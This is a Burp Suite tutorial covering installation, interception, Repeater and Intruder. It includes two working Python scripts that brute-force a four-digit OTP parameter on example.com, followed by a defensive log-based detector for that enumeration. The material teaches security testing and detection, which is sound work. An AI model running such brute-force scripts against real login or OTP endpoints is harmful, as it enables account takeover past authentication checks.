Understanding the Key Features of Burp Suite
Burp Suite
Definition
Burp Suite is a web proxy (packet manipulation) program that sits between the client and the server.
It lets you intercept the data exchanged between the two and provides tools such as a vulnerability scanner and interface analysis tools for web applications.
Usage
Detecting vulnerabilities in web applications
Fixing security flaws
Analyzing web application interfaces
Installation on Ubuntu
Install Java
sudo apt-get install openjdk-8-jre
Download Burp Suite Community edition
Run the installation file
Open the terminal in the download folder
sudo bash burpsuite_community_linux_v2021_9_1.sh
Run Burp Suite
Go to /usr/local/bin, the default installation location, and run Burp Suite from the terminal:
./BurpSuiteCommunity
Key Features of Burp Suite
Intercept
Definition
This Burp Suite feature holds requests before they reach the server. You can modify the intercepted request and then send it on.
Steps
Proxy > Intercept > turn Intercept on
Open the browser
All requests made by the Chromium browser that opens are held by Burp Suite and are not sent to the server until you allow them.
Forward: Sends the stopped request to the server. You can modify the request before sending it.
Drop: Deletes the stopped request. The server does not receive this request.
History
Definition
This Burp Suite feature shows every request and response made by the Chromium browser.
Steps
Proxy > Intercept > HTTP history
Open the browser
You can view all requests and responses made in the opened Chromium browser.
Repeater
Definition
This Burp Suite feature lets you send a request to the server repeatedly, modifying it between sends, and see each response immediately.
Steps
Proxy > Intercept > HTTP history > select the request you want to repeat > right-click > Send to Repeater
Modify the request and click "Send" to see the response
Intruder
Definition
This Burp Suite feature sends a request repeatedly with varying payloads, which allows, for example, brute-forcing passwords.
Steps
Proxy > Intercept > HTTP history > select the request you want to repeat > right-click > Send to Intruder
Positions > Clear > select the part you want to vary on each request > Add
Payloads > set how the selected part is to be varied
Start attack
The attack is fairly slow and the payload positions and lists have to be chosen from predefined options, so if you need complex conditions it is better to write a separate Python script for the attack.
Python libraries such as httplib2 or requests can take the place of the Intruder function.
Python Example
HTTP request: GET example.php?otp_num=1111 HTTP/1.1
Variable: otp_num
Range of attempts: 0000~9999
Condition: Success
Using httplib2:

import httplib2

# Target website URL (here: example.com)
url = "https://example.com/example.php"

# Create an httplib2 instance
http_obj = httplib2.Http()

# Range of otp_num (0000 to 9999)
for otp_num in range(10000):
    # Format otp_num as a 4-digit number (e.g., 0035)
    otp_num_formatted = f"{otp_num:04d}"
    # Add otp_num parameter to GET request
    request_url = f"{url}?otp_num={otp_num_formatted}"
    response, content = http_obj.request(request_url, method="GET")

    # You can modify the processing depending on how you want to find the desired result.
    # For example, if the server returns a specific message, you can check it.
    # httplib2 returns the body as bytes, so compare against a bytes literal.
    if b"Success" in content:
        print(f"Success! OTP number is: {otp_num_formatted}")
        break
    else:
        print(f"Failed for OTP number: {otp_num_formatted}")
Using requests:

import requests

# Target website URL (here: example.com)
url = "https://example.com/example.php"

# Range of otp_num (0000 to 9999)
for otp_num in range(10000):
    # Format otp_num as a 4-digit number (e.g., 0035)
    otp_num_formatted = f"{otp_num:04d}"
    # Add otp_num parameter to GET request (requests encodes the query string)
    response = requests.get(url, params={"otp_num": otp_num_formatted})

    # You can modify the processing depending on how you want to find the desired result.
    # For example, if the server returns a specific message, you can check it.
    if "Success" in response.text:
        print(f"Success! OTP number is: {otp_num_formatted}")
        break
    else:
        print(f"Failed for OTP number: {otp_num_formatted}")
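Defensive counterpart to the Intruder/OTP scenario above, added here as an example that is not part of the original page: a detector that parses web-server access-log lines and flags any client that tries many distinct otp_num values against example.php inside a sliding time window, which is exactly the traffic the scripts above produce. The Common Log Format layout, the IP addresses, the 60-second window and the threshold of 5 distinct values are assumptions, and the log lines are constructed for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qsl

# Common Log Format line; only the fields the detector needs are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+)[^"]*"')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
TARGET_PATH, TARGET_PARAM = "/example.php", "otp_num"  # endpoint and parameter from the page's scenario

def parse_otp_attempt(line):
    """Return (ip, timestamp, otp_value) for a request to TARGET_PATH carrying TARGET_PARAM, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("path").partition("?")
    params = dict(parse_qsl(query))
    if path != TARGET_PATH or TARGET_PARAM not in params:
        return None
    return m.group("ip"), datetime.strptime(m.group("ts"), TS_FMT), params[TARGET_PARAM]

def detect_otp_enumeration(lines, window=timedelta(seconds=60), threshold=5):
    """Return {ip: most distinct otp_num values tried within any `window`} for clients over `threshold`."""
    attempts = defaultdict(list)
    for ip, ts, otp in filter(None, map(parse_otp_attempt, lines)):
        attempts[ip].append((ts, otp))
    flagged = {}
    for ip, events in attempts.items():
        events.sort()
        best = start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:  # slide the window forward
                start += 1
            best = max(best, len({otp for _, otp in events[start:end + 1]}))
        if best > threshold:
            flagged[ip] = best
    return flagged

def build_sample_log():
    """Constructed sample lines (not real traffic): one client walks otp_num 0000..0024 at one
    request per second; a second client makes two attempts and one unrelated request."""
    base = datetime(2023, 10, 10, 13, 55, 36, tzinfo=timezone.utc)
    fmt = '{ip} - - [{ts}] "GET {path} HTTP/1.1" 200 512'
    stamp = lambda s: (base + timedelta(seconds=s)).strftime(TS_FMT)
    lines = [fmt.format(ip="203.0.113.7", ts=stamp(i), path=f"/example.php?otp_num={i:04d}") for i in range(25)]
    lines.append(fmt.format(ip="198.51.100.4", ts=stamp(3), path="/example.php?otp_num=4821"))
    lines.append(fmt.format(ip="198.51.100.4", ts=stamp(40), path="/example.php?otp_num=4812"))
    lines.append(fmt.format(ip="198.51.100.4", ts=stamp(41), path="/index.html"))
    return lines
```

Calling detect_otp_enumeration(build_sample_log()) returns {'203.0.113.7': 25}: the sequential client is flagged, while the client with two attempts stays under the threshold and the unrelated request is ignored.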